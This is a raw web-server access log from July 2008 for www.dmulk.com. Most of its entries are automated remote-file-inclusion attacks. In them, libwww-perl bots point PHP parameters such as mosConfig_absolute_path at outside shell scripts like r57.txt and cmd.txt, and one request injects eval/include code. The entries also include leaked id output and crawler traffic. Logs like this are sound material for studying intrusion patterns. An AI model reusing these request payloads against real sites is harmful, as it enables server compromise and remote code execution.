216.246.77.172 - - [29/Jul/2008:09:19:38 -0700] "GET /logs/index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
132.199.139.171 - - [29/Jul/2008:09:19:39 -0700] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 200 18597 "-" "libwww-perl/5.803" "www.dmulk.com"
85.234.133.173 - - [29/Jul/2008:09:19:44 -0700] "GET /logs/access_080207.log///vwar/backup/errors.php?error=http://artyficio.com/new/it.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.234.133.173 - - [29/Jul/2008:09:19:44 -0700] "GET ///vwar/backup/errors.php?error=http://artyficio.com/new/it.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.234.133.173 - - [29/Jul/2008:09:19:45 -0700] "GET /logs///vwar/backup/errors.php?error=http://artyficio.com/new/it.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
200.99.76.3 - - [29/Jul/2008:09:19:46 -0700] "GET /logs/access_080315.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.99.76.3 - - [29/Jul/2008:09:19:46 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.99.76.3 - - [29/Jul/2008:09:19:47 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.17.183 - - [29/Jul/2008:09:20:06 -0700] "GET /logs/access_071218.log HTTP/1.0" 200 141071 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
61.241.88.28 - - [29/Jul/2008:09:20:10 -0700] "GET /logs/access_080118.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://mabat.edumining.info/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.241.88.28 - - [29/Jul/2008:09:20:10 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://mabat.edumining.info/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.241.88.28 - - [29/Jul/2008:09:20:10 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://mabat.edumining.info/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.241.88.28 - - [29/Jul/2008:09:20:19 -0700] "GET /logs/access_080110.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://mabat.edumining.info/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.234.133.173 - - [29/Jul/2008:09:20:55 -0700] "GET /logs/access_080207.log///vwar/backup/errors.php?error=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.234.133.173 - - [29/Jul/2008:09:20:55 -0700] "GET ///vwar/backup/errors.php?error=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.234.133.173 - - [29/Jul/2008:09:20:56 -0700] "GET /logs///vwar/backup/errors.php?error=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
200.251.162.130 - - [29/Jul/2008:09:20:56 -0700] "GET /logs/access_080315.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.251.162.130 - - [29/Jul/2008:09:20:56 -0700] "GET /logs/access_080315.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.251.162.130 - - [29/Jul/2008:09:20:56 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.251.162.130 - - [29/Jul/2008:09:20:56 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.251.162.130 - - [29/Jul/2008:09:20:57 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.251.162.130 - - [29/Jul/2008:09:20:57 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.234.133.173 - - [29/Jul/2008:09:21:23 -0700] "GET /logs/access_080207.log///vwar/backup/errors.php?error=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.234.133.173 - - [29/Jul/2008:09:21:24 -0700] "GET ///vwar/backup/errors.php?error=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.234.133.173 - - [29/Jul/2008:09:21:24 -0700] "GET /logs///vwar/backup/errors.php?error=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.225.213.252 - - [29/Jul/2008:09:21:36 -0700] "GET /logs/access_080218.log//modules/TotalCalendar/about.php?inc_dir=http://star.jbsc.ac.kr/technote/config/menu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.225.213.252 - - [29/Jul/2008:09:21:37 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://star.jbsc.ac.kr/technote/config/menu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.225.213.252 - - [29/Jul/2008:09:21:37 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://star.jbsc.ac.kr/technote/config/menu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.108.67.119 - - [29/Jul/2008:09:21:37 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.67.119 - - [29/Jul/2008:09:21:41 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.6.8.104 - - [29/Jul/2008:09:21:44 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
87.106.191.163 - - [29/Jul/2008:09:21:47 -0700] "GET /logs/access.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=uid=10042(susanita)%20gid=2523(psacln)%20groups=16(dialout),33(video),2523(psacln)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.192.77.37 - - [29/Jul/2008:09:21:47 -0700] "GET /logs/contacts.php?cal_dir=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.192.77.37 - - [29/Jul/2008:09:21:48 -0700] "GET /contacts.php?cal_dir=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.36.250.17 - - [29/Jul/2008:09:21:49 -0700] "GET /logs/access.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://dpfbrasil.net63.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
201.36.250.17 - - [29/Jul/2008:09:21:49 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://dpfbrasil.net63.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
201.36.250.17 - - [29/Jul/2008:09:21:49 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://dpfbrasil.net63.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
66.225.213.252 - - [29/Jul/2008:09:21:49 -0700] "GET /logs/access_080313.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://star.jbsc.ac.kr/technote/config/menu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.225.213.252 - - [29/Jul/2008:09:21:55 -0700] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://star.jbsc.ac.kr/technote/config/menu/id.txt?? HTTP/1.1" 200 3694 "-" "libwww-perl/5.810" "www.dmulk.com"
74.6.8.104 - - [29/Jul/2008:09:21:55 -0700] "GET /blog/index.php/2008/?show=gallery HTTP/1.0" 200 53322 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
66.225.213.252 - - [29/Jul/2008:09:21:55 -0700] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://star.jbsc.ac.kr/technote/config/menu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.99.76.3 - - [29/Jul/2008:09:21:55 -0700] "GET /logs/access_080315.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.99.76.3 - - [29/Jul/2008:09:21:55 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.133.102.211 - - [29/Jul/2008:09:21:55 -0700] "GET //index2.php?DOCUMENT_ROOT=http://tartufellinolol.altervista.org/piccino/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
200.99.76.3 - - [29/Jul/2008:09:21:56 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.133.102.211 - - [29/Jul/2008:09:21:56 -0700] "GET /logs/access.log//index2.php?DOCUMENT_ROOT=http://tartufellinolol.altervista.org/piccino/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
213.133.102.211 - - [29/Jul/2008:09:21:56 -0700] "GET /logs//index2.php?DOCUMENT_ROOT=http://tartufellinolol.altervista.org/piccino/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
85.234.133.173 - - [29/Jul/2008:09:21:57 -0700] "GET /logs/access_080315.log///vwar/backup/errors.php?error=http://artyficio.com/new/it.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.192.77.37 - - [29/Jul/2008:09:22:02 -0700] "GET /logs//admin.php?cal_dir=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.192.77.37 - - [29/Jul/2008:09:22:02 -0700] "GET //admin.php?cal_dir=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.99.76.3 - - [29/Jul/2008:09:22:02 -0700] "GET /logs/access_080207.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.196.2.205 - - [29/Jul/2008:09:22:29 -0700] "GET /logs/access_080315.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.196.2.205 - - [29/Jul/2008:09:22:31 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.196.2.205 - - [29/Jul/2008:09:22:32 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.234.133.173 - - [29/Jul/2008:09:22:41 -0700] "GET /logs/access_080315.log///vwar/backup/errors.php?error=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
201.130.79.130 - - [29/Jul/2008:09:22:47 -0700] "GET /logs/access_080218.log/view.php?sub=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.130.79.130 - - [29/Jul/2008:09:22:47 -0700] "GET /view.php?sub=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.130.79.130 - - [29/Jul/2008:09:22:47 -0700] "GET /logs/view.php?sub=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.85.201.66 - - [29/Jul/2008:09:22:49 -0700] "GET /errors.php?error=http://www.latinamericancongress.com/imag_eventos/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.201.66 - - [29/Jul/2008:09:22:49 -0700] "GET /logs/errors.php?error=http://www.latinamericancongress.com/imag_eventos/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.225.213.252 - - [29/Jul/2008:09:22:53 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://star.jbsc.ac.kr/technote/config/menu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
222.73.41.9 - - [29/Jul/2008:09:23:03 -0700] "GET /logs/access_080120.log HTTP/1.1" 200 585838 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
66.249.70.134 - - [29/Jul/2008:09:23:04 -0700] "GET /blog/index.php/feed/?show=gallery&nggpage=3 HTTP/1.1" 304 1 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "dmulk.com"
193.235.140.231 - - [29/Jul/2008:09:23:06 -0700] "GET /logs/access_080218.log HTTP/1.1" 200 327680 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
62.152.41.170 - - [29/Jul/2008:09:23:10 -0700] "GET /logs/access_080329.log/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://shopsb.ru/THIEF/kiss/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.234.133.173 - - [29/Jul/2008:09:23:11 -0700] "GET /logs/access_080315.log///vwar/backup/errors.php?error=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.97.229.104 - - [29/Jul/2008:09:23:17 -0700] "GET /logs/access.log/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://purearcade.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.152.41.170 - - [29/Jul/2008:09:23:20 -0700] "GET /logs/errors.php?error=http://shopsb.ru/THIEF/kiss/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.152.41.170 - - [29/Jul/2008:09:23:20 -0700] "GET /errors.php?error=http://shopsb.ru/THIEF/kiss/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.125.211.84 - - [29/Jul/2008:09:23:27 -0700] "GET /logs/access.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.icamotorediciones.es/administrator/popups/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
59.125.211.84 - - [29/Jul/2008:09:23:28 -0700] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.icamotorediciones.es/administrator/popups/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
74.53.39.34 - - [29/Jul/2008:09:23:28 -0700] "GET /logs/access_080322.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://mystjohn.org/calendar/docs/_vti_cnf/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.152.41.170 - - [29/Jul/2008:09:23:28 -0700] "GET /logs/access_080313.log/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://shopsb.ru/THIEF/kiss/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.236.221.63 - - [29/Jul/2008:09:23:35 -0700] "GET /logs/access_080129.log//skin/zero_vote/errors.php?error=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
222.236.221.63 - - [29/Jul/2008:09:23:36 -0700] "GET /logs/access_080110.log//skin/zero_vote/errors.php?error=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
222.236.221.63 - - [29/Jul/2008:09:23:39 -0700] "GET /logs/access_080110.log//skin/zero_vote/errors.php?error=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.210.115.114 - - [29/Jul/2008:09:23:41 -0700] "GET /logs//lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://growlibear.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
207.210.115.114 - - [29/Jul/2008:09:23:41 -0700] "GET //lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://growlibear.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
222.236.221.63 - - [29/Jul/2008:09:23:41 -0700] "GET //skin/zero_vote/error.php?dir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
216.246.77.172 - - [29/Jul/2008:09:23:57 -0700] "GET /logs/access_080313.log/index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.251.162.130 - - [29/Jul/2008:09:24:00 -0700] "GET /logs/access_080315.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.251.162.130 - - [29/Jul/2008:09:24:00 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.251.162.130 - - [29/Jul/2008:09:24:02 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.246.77.172 - - [29/Jul/2008:09:24:02 -0700] "GET /logs/index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.246.77.172 - - [29/Jul/2008:09:24:05 -0700] "GET /index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 200 3694 "-" "libwww-perl/5.810" "www.dmulk.com"
74.6.8.104 - - [29/Jul/2008:09:24:05 -0700] "GET /blog/index.php/2008/?show=gallery&nggpage=2 HTTP/1.0" 200 35786 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
200.251.162.130 - - [29/Jul/2008:09:24:06 -0700] "GET /logs/access_080315.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.251.162.130 - - [29/Jul/2008:09:24:07 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.99.76.3 - - [29/Jul/2008:09:24:08 -0700] "GET /logs/access_080207.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.251.162.130 - - [29/Jul/2008:09:24:08 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.207.106.54 - - [29/Jul/2008:09:24:19 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://mabat.edumining.info/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.207.106.54 - - [29/Jul/2008:09:24:19 -0700] "GET /logs/access_080118.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://mabat.edumining.info/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.207.106.54 - - [29/Jul/2008:09:24:19 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://mabat.edumining.info/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
204.10.38.130 - - [29/Jul/2008:09:24:36 -0700] "GET /logs/access_080313.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://moisidis.gr/siteframe/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.240.136.189 - - [29/Jul/2008:09:24:37 -0700] "GET /logs/access_080120.log HTTP/1.1" 200 262144 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
204.10.38.130 - - [29/Jul/2008:09:24:37 -0700] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://moisidis.gr/siteframe/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.132.77.71 - - [29/Jul/2008:09:24:39 -0700] "GET /logs/access_080130.log HTTP/1.1" 200 196608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
200.251.162.130 - - [29/Jul/2008:09:24:40 -0700] "GET /logs/access_080207.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.251.162.130 - - [29/Jul/2008:09:24:41 -0700] "GET /logs/access_080207.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.224.74.43 - - [29/Jul/2008:09:24:54 -0700] "GET /logs/access_080130.log HTTP/1.1" 200 393216 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
222.236.221.63 - - [29/Jul/2008:09:25:06 -0700] "GET /logs/access_071225.log//skin/zero_vote/error.php?dir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
70.84.182.98 - - [29/Jul/2008:09:25:10 -0700] "GET //lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://growlibear.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
70.84.182.98 - - [29/Jul/2008:09:25:10 -0700] "GET /logs//lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://growlibear.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
62.149.205.38 - - [29/Jul/2008:09:25:20 -0700] "GET /logs/access.log/s_loadenv.inc.php?DOCUMENT_ROOT=http://www.caffediperugia.it/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.149.205.38 - - [29/Jul/2008:09:25:21 -0700] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.caffediperugia.it/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.149.205.38 - - [29/Jul/2008:09:25:22 -0700] "GET /logs/s_loadenv.inc.php?DOCUMENT_ROOT=http://www.caffediperugia.it/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.75.193.70 - - [29/Jul/2008:09:25:27 -0700] "GET /doceboCms/class/class.dashboard_cms.php?where_framework=http://alohaclubhawaii.com/members/community/plugins/safehtml/poiid.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.75.193.70 - - [29/Jul/2008:09:25:27 -0700] "GET /logs/doceboCms/class/class.dashboard_cms.php?where_framework=http://alohaclubhawaii.com/members/community/plugins/safehtml/poiid.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.75.193.70 - - [29/Jul/2008:09:25:27 -0700] "GET /logs/access_080313.log/doceboCms/class/class.dashboard_cms.php?where_framework=http://alohaclubhawaii.com/members/community/plugins/safehtml/poiid.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
